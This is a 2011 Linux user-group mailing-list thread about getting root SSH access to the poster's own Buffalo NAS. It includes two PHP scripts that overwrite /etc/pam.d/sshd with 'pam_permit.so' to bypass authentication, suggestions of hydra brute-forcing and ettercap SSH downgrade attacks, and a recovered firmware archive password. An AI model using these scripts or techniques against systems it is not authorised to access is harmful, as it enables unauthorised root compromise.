Is it possible to extract the root password from the file system?

Mark Phillips mark at phillipsmarketing.biz
Tue Jul 19 11:37:06 MST 2011 

On Mon, Jul 18, 2011 at 10:06 PM, Dan Dubovik <dandubo at gmail.com> wrote:

> Can you SSH as the hammerhead user?
>
No
mark at orca:~/Desktop/buffalo_nas$ ssh hammerhead at xxx.xxx.xxx.xxx
Password:
Connection to xxx.xxx.xxx.xxx closed by remote host.
Connection to xxx.xxx.xxx.xxx closed.

>
> When you FTP as the hammerhead user, can you move the script.php file to
> the htdocs directory?  It has 777 permissions, so should be able to open it
> / drop a file there.
>
Yes, I can, and it does execute.

>
> If you can get a PHP file uploaded and able to execute properly, perhaps a
> PHP based shell could help?

I am not a php guy.....I don't know how to do this.

I tried a script to allow ssh without password for anyone. It seems to have
written the file, however, I still cannot ssh in as root. Note: this is my
first php script; the pint statements helped me debug and see if it was
working.

<?php
echo "starting...<br>";
$filename = '/etc/pam.d/sshd';
$fh = fopen($filename, 'w+') or die("can't open file");
$contents = fread($fh, 1000);
echo "..file contents:<br> $contents<br>";

$stringData = "account  required   pam_unix.so\n";
$fw = fwrite($fh, $stringData);
if ($fw == false)
    echo "...#1 no luck writing file<br>";
else
    echo "...wrote $fw bytes: '$stringData'<br>";

$stringData = "session  required   pam_unix.so\n";
$fw = fwrite($fh, $stringData);
if ($fw == false)
    echo "...#2 no luck writing file<br>";
else
    echo "...wrote $fw bytes: '$stringData'<br>";

$stringData = "auth required pam_permit.so\n";
$fw = fwrite($fh, $stringData);
if ($fw == false)
    echo "...#3 no luck writing file<br>";
else
    echo "...wrote $fw bytes: '$stringData'<br>";

rewind($fh);
$contents = fread($fh, 1000);
echo "...final file contents:<br> $contents<br>";

fclose($fh);
echo "done!<br>";
?>

Output from the script:
starting...
..file contents:

...wrote 32 bytes: 'account required pam_unix.so '
...wrote 32 bytes: 'session required pam_unix.so '
...wrote 28 bytes: 'auth required pam_permit.so '
...final file contents:
account required pam_unix.so session required pam_unix.so auth required
pam_permit.so
done!

One strange behavior....when I re-run the script, I expected to see the
contents of the file displayed after 'starting...' above, but it always
comes back blank, and I still cannot login using ssh....

I did this:
1. restart the nas
2. run script
3. I get this ouput:
mark at orca:~/Desktop/buffalo_nas$ ssh root at xxx.xxx.xxx.xxx
Connection closed by xxx.xxx.xxx.xxx

4. reset nas again
5 I get this ouput:
mark at orca:~/Desktop/buffalo_nas$ ssh root at xxx.xxx.xxx.xxx
Password:
Password:
Password:

Then all I get when I try to ssh in is Connection closed.

Does anyone have any php scripts to hack this box and give me root access
via ssh?

Thanks!

Mark

>
> -- Dan.
>
> On Mon, Jul 18, 2011 at 9:20 PM, Lisa Kachold <lisakachold at obnosis.com>wrote:
>
>> I believe the script.php has to be moved the webroot directory and given
>> permissions there I believe, but well if you can't get a login via ssh... --
>> how to do it?
>>
>>
>> On Sun, Jul 17, 2011 at 8:58 AM, Mark Phillips <
>> mark at phillipsmarketing.biz> wrote:
>>
>>> On Sun, Jul 17, 2011 at 3:54 AM, Lisa Kachold <lisakachold at obnosis.com>wrote:
>>>
>>>> There are alot of password files and dictionary lists on various sites.
>>>> Backtrack5 contains a good number.
>>>>
>>>> But I imagine that it's either not allowing root via ssh or you have the
>>>> wrong username.
>>>>
>>>
>>> It turns out the box is smarter than a fifth grader.....after a few hydra
>>> attacks, it started rejecting all the hydra attempts to ssh in via root.
>>> Once I stopped hydra (after running all night), it took a couple of hours
>>> before it would respond to ssh attempts from root. It now will ask for the
>>> root password, but I still have no idea what it is.
>>>
>>>>
>>>> Or it's a truely random string.
>>>>
>>> It could be....the password for the zip file to unzip the file system is
>>>
>>>  YvSInIQopeipx66t_DCdfEvfP47qeVPhNhAuSYmA4
>>>
>>> . Someone retrieved it using a disassembler on the file system.
>>>
>>> I did some more reading, and one person was able to use php to allow ssh
>>> login. The box allows one to create a web space, and it comes with php
>>> installed. One can edit the php.ini file, and I can upload via ftp a php
>>> script. The script they suggested is:
>>> <?php
>>> $file = '../../../../etc/pam.d/sshd';
>>> $fh=fopen($file, 'w') or die("can't open file");
>>> $stringData = "account  required   pam_unix.so\n";
>>> fwrite($fh, $stringData);
>>> $stringData = "session  required   pam_unix.so\n";
>>> fwrite($fh, $stringData);
>>> $stringData = "auth required pam_permit.so\n";
>>> fwrite($fh, $stringData);
>>> fclose($fh);
>>> ?>
>>>
>>> I uploaded the script, but I get a 404 File not Found when I access the
>>> page. I thought it might be a file permission error since the file is only
>>> rw. I tried chmod 777 at the ftp prompt, and got the error message File not
>>> Found, but ls shows it is there.
>>>
>>> ftp> ls
>>> 200 PORT command successful
>>> 150 Opening ASCII mode data connection for file list
>>> drwxrwxrwx   2 apache   apache          6 Jul 17 08:23 cgi-bin
>>> drwxrwxrwx   2 apache   apache         22 Jul 17 08:23 htdocs
>>> drwxrwxrwx   2 apache   apache         39 Jul 17 08:23 log
>>> -rw-rw-rw-   1 hammerhead hdusers       335 Jul 17 08:49 script.php
>>> 226 Transfer complete
>>> ftp> chmod 777 script.php
>>> 550 CHMOD 777 script.php: No such file or directory
>>> ftp>
>>>
>>> Is there anything I can change in the php.ini file to make this script
>>> execute? Or, am I missing something else?
>>>
>>> BTW, I cannot ftp as root, but I can ftp as a user I created, hammerhead.
>>>
>>> Thanks,
>>>
>>> Mark
>>>
>>>>
>>>> On Fri, Jul 15, 2011 at 10:33 PM, Mark Phillips <
>>>> mark at phillipsmarketing.biz> wrote:
>>>>
>>>>> Since this is a drive buffalo, I might try ettercap ssh downgrade
>>>>>> attack:
>>>>>>
>>>>>> http://openmaniak.com/ettercap_filter.php
>>>>>> ttp://
>>>>>> sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade
>>>>>>
>>>>>> Not sure how a man in the middle attack will work, since I don't know
>>>>> the password to begin with...
>>>>>
>>>>> Or Hydra:
>>>>>>
>>>>>> Hydra Instructions:
>>>>>>
>>>>>> http://www.youtube.com/watch?v=7CP-JB4QARo
>>>>>>
>>>>>>>
>>>>>>>> Hydra is promising. I tried it with the common passwords list from
>>>>> openwall. No luck. Do you have any better password lists?
>>>>>
>>>>> Thanks,
>>>>>
>>>>> Mark
>>>>>
>>>>> ---------------------------------------------------
>>>>> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
>>>>> To subscribe, unsubscribe, or to change your mail settings:
>>>>> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>>>>>
>>>>
>>>>
>>>>
>>>> --
>>>> (602) 791-8002  Android
>>>> (623) 239-3392 Skype
>>>> (623) 688-3392 Google Voice
>>>> **
>>>> HomeSmartInternational.com <http://www.homesmartinternational.com>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>> ---------------------------------------------------
>>>> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
>>>> To subscribe, unsubscribe, or to change your mail settings:
>>>> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>>>>
>>>
>>>
>>> ---------------------------------------------------
>>> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
>>> To subscribe, unsubscribe, or to change your mail settings:
>>> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>>>
>>
>>
>>
>> --
>> (602) 791-8002  Android
>> (623) 239-3392 Skype
>> (623) 688-3392 Google Voice
>> **
>> HomeSmartInternational.com <http://www.homesmartinternational.com>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>> ---------------------------------------------------
>> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
>> To subscribe, unsubscribe, or to change your mail settings:
>> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>>
>
>
> ---------------------------------------------------
> PLUG-discuss mailing list - PLUG-discuss at lists.plug.phoenix.az.us
> To subscribe, unsubscribe, or to change your mail settings:
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.PLUG.phoenix.az.us/pipermail/plug-discuss/attachments/20110719/4f46db93/attachment.html>

More information about the PLUG-discuss mailing list